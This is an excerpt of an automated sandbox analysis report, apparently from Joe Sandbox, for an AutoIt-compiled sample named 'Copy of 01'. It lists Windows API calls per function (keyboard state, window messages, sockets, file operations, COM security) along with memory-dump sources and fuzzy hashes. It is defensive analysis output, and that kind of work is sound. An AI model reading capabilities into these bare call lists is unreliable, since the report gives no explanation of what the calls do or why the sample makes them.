                        • API String ID: 2533919879-2896544425
                        APIs
                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 003C3925
                        • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 003C393A
                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 003C3954
                        • _wcslen.LIBCMT ref: 003C3999
                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 003C39C6
                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 003C39F4
                        Similarity
                        • API ID: MessageSend$Window_wcslen
                        • String ID: SysListView32
                        • API String ID: 2147712094-78025650
                        APIs
                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0039BCFD
                        • IsMenu.USER32(00000000), ref: 0039BD1D
                        • CreatePopupMenu.USER32 ref: 0039BD53
                        • GetMenuItemCount.USER32(014B6338), ref: 0039BDA4
                        • InsertMenuItemW.USER32(014B6338,?,00000001,00000030), ref: 0039BDCC
                        Similarity
                        • API ID: Menu$Item$CountCreateInfoInsertPopup
                        • String ID: 0$2
                        • API String ID: 93392585-3793063076
                        APIs
                        • _ValidateLocalCookies.LIBCMT ref: 00352D4B
                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00352D53
                        • _ValidateLocalCookies.LIBCMT ref: 00352DE1
                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00352E0C
                        • _ValidateLocalCookies.LIBCMT ref: 00352E61
                        Similarity
                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                        • String ID: &H5$csm
                        • API String ID: 1170836740-3207714950
                        APIs
                        • LoadIconW.USER32(00000000,00007F03), ref: 0039C913
                        Similarity
                        • API ID: IconLoad
                        • String ID: blank$info$question$stop$warning
                        • API String ID: 2457776203-404129466
                        Similarity
                        • API ID: _wcslen$LocalTime
                        • String ID:
                        • API String ID: 952045576-0
                        APIs
                        • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0038682C,00000004,00000000,00000000), ref: 0034F953
                        • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0038682C,00000004,00000000,00000000), ref: 0038F3D1
                        • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0038682C,00000004,00000000,00000000), ref: 0038F454
                        Similarity
                        • API ID: ShowWindow
                        • String ID:
                        • API String ID: 1268545403-0
                        APIs
                        • DeleteObject.GDI32(00000000), ref: 003C2D1B
                        • GetDC.USER32(00000000), ref: 003C2D23
                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 003C2D2E
                        • ReleaseDC.USER32(00000000,00000000), ref: 003C2D3A
                        • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 003C2D76
                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 003C2D87
                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,003C5A65,?,?,000000FF,00000000,?,000000FF,?), ref: 003C2DC2
                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 003C2DE1
                        Similarity
                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                        • String ID:
                        • API String ID: 3864802216-0
                        Similarity
                        • API ID: _memcmp
                        • String ID:
                        • API String ID: 2931989736-0
                        Similarity
                        • API ID:
                        • String ID: NULL Pointer assignment$Not an Object type
                        • API String ID: 0-572801152
                        APIs
                        • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,003717FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 003715CE
                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,003717FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00371651
                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,003717FB,?,003717FB,00000000,00000000,?,00000000,?,?,?,?), ref: 003716E4
                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,003717FB,00000000,00000000,?,00000000,?,?,?,?), ref: 003716FB
                          • Part of subcall function 00363820: RtlAllocateHeap.NTDLL(00000000,?,00401444,?,0034FDF5,?,?,0033A976,00000010,00401440,003313FC,?,003313C6,?,00331129), ref: 00363852
                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,003717FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00371777
                        • __freea.LIBCMT ref: 003717A2
                        • __freea.LIBCMT ref: 003717AE
                        Similarity
                        • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                        • String ID:
                        • API String ID: 2829977744-0
                        Similarity
                        • API ID: Variant$ClearInit
                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                        • API String ID: 2610073882-625585964
                        APIs
                        • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 003A125C
                        • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 003A1284
                        • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 003A12A8
                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 003A12D8
                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 003A135F
                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 003A13C4
                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 003A1430
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ArraySafe$Data$Access$UnaccessVartype
                        • String ID:
                        • API String ID: 2550207440-0
                        • Opcode ID: 1260888f34085d8d23104b9d11c85cbc20721fe56dc7a9812cb3b3c4bed7bd59
                        • Instruction ID: cb9bbc8e52674bb705b8ac1a48ce8e9abe9241c3b68b4d0dcf841ae786a1fbf9
                        • Opcode Fuzzy Hash: 1260888f34085d8d23104b9d11c85cbc20721fe56dc7a9812cb3b3c4bed7bd59
                        • Instruction Fuzzy Hash: 28913475A00208AFDB07DF99C884BBEB7B9FF06321F118429E941EB291D774E941CB90
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ObjectSelect$BeginCreatePath
                        • String ID:
                        • API String ID: 3225163088-0
                        • Opcode ID: 193bfafaed8713ac8f1af2c483efbb12d8cba41b7347e996c4d6ea3286bc1c78
                        • Instruction ID: 797007579a0e28533807adc3e9f975ca7893f8858cc9af3b6328c6f1ede3e4a7
                        • Opcode Fuzzy Hash: 193bfafaed8713ac8f1af2c483efbb12d8cba41b7347e996c4d6ea3286bc1c78
                        • Instruction Fuzzy Hash: 1B913A71D00219EFCB12CFA9CC84AEEBBB9FF49320F25459AE515BB251D374A941CB60
                        APIs
                        • VariantInit.OLEAUT32(?), ref: 003B396B
                        • CharUpperBuffW.USER32(?,?), ref: 003B3A7A
                        • _wcslen.LIBCMT ref: 003B3A8A
                        • VariantClear.OLEAUT32(?), ref: 003B3C1F
                          • Part of subcall function 003A0CDF: VariantInit.OLEAUT32(00000000), ref: 003A0D1F
                          • Part of subcall function 003A0CDF: VariantCopy.OLEAUT32(?,?), ref: 003A0D28
                          • Part of subcall function 003A0CDF: VariantClear.OLEAUT32(?), ref: 003A0D34
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                        • API String ID: 4137639002-1221869570
                        • Opcode ID: bfdb8b294d637ded3aaeb275bab24a4e54ba13a27ebed07f154bd53a7cd75a3e
                        • Instruction ID: 0df644045c66102540d143ff37577256178a5dce3525cc45c5e98cb80bb3884e
                        • Opcode Fuzzy Hash: bfdb8b294d637ded3aaeb275bab24a4e54ba13a27ebed07f154bd53a7cd75a3e
                        • Instruction Fuzzy Hash: E4919B756083059FCB05DF28C4819AAB7E4FF89318F14882DF98A9B751DB30EE05CB82
                        APIs
                          • Part of subcall function 0039000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0038FF41,80070057,?,?,?,0039035E), ref: 0039002B
                          • Part of subcall function 0039000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0038FF41,80070057,?,?), ref: 00390046
                          • Part of subcall function 0039000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0038FF41,80070057,?,?), ref: 00390054
                          • Part of subcall function 0039000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0038FF41,80070057,?), ref: 00390064
                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 003B4C51
                        • _wcslen.LIBCMT ref: 003B4D59
                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 003B4DCF
                        • CoTaskMemFree.OLE32(?), ref: 003B4DDA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                        • String ID: NULL Pointer assignment
                        • API String ID: 614568839-2785691316
                        • Opcode ID: cae17fc5eb6ef2b9e0a4356ff3d67c5a3483056aa6bd06b1c8d66199aa5f69d1
                        • Instruction ID: 2d0893a1946bb391a3cc08195c700352a46244aaad5167382d4d9677d11f03d3
                        • Opcode Fuzzy Hash: cae17fc5eb6ef2b9e0a4356ff3d67c5a3483056aa6bd06b1c8d66199aa5f69d1
                        • Instruction Fuzzy Hash: D8910771D0021DAFDF16DFA4D891EEEB7B8BF48314F10816AE915AB251DB709A44CFA0
                        APIs
                        • GetMenu.USER32(?), ref: 003C2183
                        • GetMenuItemCount.USER32(00000000), ref: 003C21B5
                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 003C21DD
                        • _wcslen.LIBCMT ref: 003C2213
                        • GetMenuItemID.USER32(?,?), ref: 003C224D
                        • GetSubMenu.USER32(?,?), ref: 003C225B
                          • Part of subcall function 00393A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00393A57
                          • Part of subcall function 00393A3D: GetCurrentThreadId.KERNEL32 ref: 00393A5E
                          • Part of subcall function 00393A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,003925B3), ref: 00393A65
                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 003C22E3
                          • Part of subcall function 0039E97B: Sleep.KERNEL32 ref: 0039E9F3
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                        • String ID:
                        • API String ID: 4196846111-0
                        • Opcode ID: 52b73704cce337d6cce7863278e9a2141caa89ee37395bb39383b871d87072ed
                        • Instruction ID: fa04670a1da774262168231863629c5162e7224012d9cfa02a18da1e1a34680d
                        • Opcode Fuzzy Hash: 52b73704cce337d6cce7863278e9a2141caa89ee37395bb39383b871d87072ed
                        • Instruction Fuzzy Hash: A5716C75A00205AFCB16EF69C885FAEB7F5EF48320F158859E816EB351DB34ED418B90
                        APIs
                        • GetParent.USER32(?), ref: 0039AEF9
                        • GetKeyboardState.USER32(?), ref: 0039AF0E
                        • SetKeyboardState.USER32(?), ref: 0039AF6F
                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 0039AF9D
                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 0039AFBC
                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 0039AFFD
                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 0039B020
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: MessagePost$KeyboardState$Parent
                        • String ID:
                        • API String ID: 87235514-0
                        • Opcode ID: 9cc9a9a53937adcdb695f77ca84fa6863c640e84bd90c31df2d3d25f6981ad11
                        • Instruction ID: 23c7e8563b71916482b1f8f02d03f38f79f0ae4027870af6171b6ca6929dc1e0
                        • Opcode Fuzzy Hash: 9cc9a9a53937adcdb695f77ca84fa6863c640e84bd90c31df2d3d25f6981ad11
                        • Instruction Fuzzy Hash: 5B51E4A0A04BD53DFF3743348D49BBABEE95B06304F098589E1DA858C2C3D8ACD8D791
                        APIs
                        • GetParent.USER32(00000000), ref: 0039AD19
                        • GetKeyboardState.USER32(?), ref: 0039AD2E
                        • SetKeyboardState.USER32(?), ref: 0039AD8F
                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0039ADBB
                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0039ADD8
                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0039AE17
                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0039AE38
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: MessagePost$KeyboardState$Parent
                        • String ID:
                        • API String ID: 87235514-0
                        • Opcode ID: 3337f804bd5b225902d9fe8102b86692726affeb85b994d4818d98aeb82d90a1
                        • Instruction ID: 61bfbadbc31200cdeb335b970cb3b50f459233702c2f4e4df2bcd7f31c4cdcf4
                        • Opcode Fuzzy Hash: 3337f804bd5b225902d9fe8102b86692726affeb85b994d4818d98aeb82d90a1
                        • Instruction Fuzzy Hash: 2451F9A1904BD53DFF3783348C55B7ABED85B46300F098689E1D54A8C2D394EC94E7D2
                        APIs
                        • GetConsoleCP.KERNEL32(00373CD6,?,?,?,?,?,?,?,?,00365BA3,?,?,00373CD6,?,?), ref: 00365470
                        • __fassign.LIBCMT ref: 003654EB
                        • __fassign.LIBCMT ref: 00365506
                        • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00373CD6,00000005,00000000,00000000), ref: 0036552C
                        • WriteFile.KERNEL32(?,00373CD6,00000000,00365BA3,00000000,?,?,?,?,?,?,?,?,?,00365BA3,?), ref: 0036554B
                        • WriteFile.KERNEL32(?,?,00000001,00365BA3,00000000,?,?,?,?,?,?,?,?,?,00365BA3,?), ref: 00365584
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                        • String ID:
                        • API String ID: 1324828854-0
                        • Opcode ID: 95531349c11d1163ed1ab2471164d71e6a9c6c6be0aea897c096a0b64d7d52d8
                        • Instruction ID: 57363828ab98470dbcc8f8342fbf873ca7d0acd6a340764332d6825521201b88
                        • Opcode Fuzzy Hash: 95531349c11d1163ed1ab2471164d71e6a9c6c6be0aea897c096a0b64d7d52d8
                        • Instruction Fuzzy Hash: CB51D7719006499FDB12CFA8D845AEEBBF9EF0A300F14816EF556E7295D730EA41CB60
                        APIs
                          • Part of subcall function 003B304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 003B307A
                          • Part of subcall function 003B304E: _wcslen.LIBCMT ref: 003B309B
                        • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 003B1112
                        • WSAGetLastError.WSOCK32 ref: 003B1121
                        • WSAGetLastError.WSOCK32 ref: 003B11C9
                        • closesocket.WSOCK32(00000000), ref: 003B11F9
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                        • String ID:
                        • API String ID: 2675159561-0
                        • Opcode ID: aea6b0599a42708713a10732d2d0daf7f34a1263ff94914fef52d7a78cbab8a3
                        • Instruction ID: 421ce458cd622659ae4b9b62277c96a2bf55275bbdc419495e67f1d6d85b1e93
                        • Opcode Fuzzy Hash: aea6b0599a42708713a10732d2d0daf7f34a1263ff94914fef52d7a78cbab8a3
                        • Instruction Fuzzy Hash: AD41F431600204AFDB129F18C895BEAB7EDEF45328F148059FA09DF691C770AD41CBA0
                        APIs
                          • Part of subcall function 0039DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0039CF22,?), ref: 0039DDFD
                          • Part of subcall function 0039DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0039CF22,?), ref: 0039DE16
                        • lstrcmpiW.KERNEL32(?,?), ref: 0039CF45
                        • MoveFileW.KERNEL32(?,?), ref: 0039CF7F
                        • _wcslen.LIBCMT ref: 0039D005
                        • _wcslen.LIBCMT ref: 0039D01B
                        • SHFileOperationW.SHELL32(?), ref: 0039D061
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                        • String ID: \*.*
                        • API String ID: 3164238972-1173974218
                        • Opcode ID: e1865751142f8e0f354077c019864b77f9142ca970fa399a6a9e4401bcd38fda
                        • Instruction ID: 3e5067dad58adde2d689b9ec07a30cd6c448f047a3372c0ee08ce4558b599913
                        • Opcode Fuzzy Hash: e1865751142f8e0f354077c019864b77f9142ca970fa399a6a9e4401bcd38fda
                        • Instruction Fuzzy Hash: 894146719452199FDF13EBA4D982EDDB7B9AF08780F1110E6E509EB141EB34AA88CB50
                        APIs
                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 003C2E1C
                        • GetWindowLongW.USER32(00000000,000000F0), ref: 003C2E4F
                        • GetWindowLongW.USER32(00000000,000000F0), ref: 003C2E84
                        • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 003C2EB6
                        • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 003C2EE0
                        • GetWindowLongW.USER32(00000000,000000F0), ref: 003C2EF1
                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 003C2F0B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: LongWindow$MessageSend
                        • String ID:
                        • API String ID: 2178440468-0
                        • Opcode ID: b9990ca09d7f702880a94cf1e5fe05ef0580aac1abbe77d3bae3555b0a76f936
                        • Instruction ID: 1a6ec41be08c7b3831b184fbbf6028170ff563e8e7f63c8e68294ff1ab73d986
                        • Opcode Fuzzy Hash: b9990ca09d7f702880a94cf1e5fe05ef0580aac1abbe77d3bae3555b0a76f936
                        • Instruction Fuzzy Hash: 9D310330604254AFDB22DF68DD84FA637E5EB8A710F1A1168F944EF2B1CB71AC50DB41
                        APIs
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00397769
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0039778F
                        • SysAllocString.OLEAUT32(00000000), ref: 00397792
                        • SysAllocString.OLEAUT32(?), ref: 003977B0
                        • SysFreeString.OLEAUT32(?), ref: 003977B9
                        • StringFromGUID2.OLE32(?,?,00000028), ref: 003977DE
                        • SysAllocString.OLEAUT32(?), ref: 003977EC
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                        • String ID:
                        • API String ID: 3761583154-0
                        • Opcode ID: 44b7591ad4a67a48abefda5c0b1693291b8f35ef558fb21c7efa686529117de4
                        • Instruction ID: 992593386b1421598b647c3897ad48920e74133e19bc6e0d91f92a9f684c1fcf
                        • Opcode Fuzzy Hash: 44b7591ad4a67a48abefda5c0b1693291b8f35ef558fb21c7efa686529117de4
                        • Instruction Fuzzy Hash: CB21A476614219AFDF12DFE9CC88CBB77ECEB09764B058025F915DB190D670EC428760
                        APIs
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00397842
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00397868
                        • SysAllocString.OLEAUT32(00000000), ref: 0039786B
                        • SysAllocString.OLEAUT32 ref: 0039788C
                        • SysFreeString.OLEAUT32 ref: 00397895
                        • StringFromGUID2.OLE32(?,?,00000028), ref: 003978AF
                        • SysAllocString.OLEAUT32(?), ref: 003978BD
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                        • String ID:
                        • API String ID: 3761583154-0
                        • Opcode ID: eef17449e3b443df78e067879885520f3f7cfeab2bed82742e0d233f6abec223
                        • Instruction ID: 7a30dbf98e9f68e905b984f348a5961cc03b3133ade18a5df7b37267447cb795
                        • Opcode Fuzzy Hash: eef17449e3b443df78e067879885520f3f7cfeab2bed82742e0d233f6abec223
                        • Instruction Fuzzy Hash: 8221A131618204AFDF12AFA9DC8DDAA77ECFB08360B158125F915CB2A1D670EC41CB64
                        APIs
                        • GetStdHandle.KERNEL32(0000000C), ref: 003A04F2
                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003A052E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
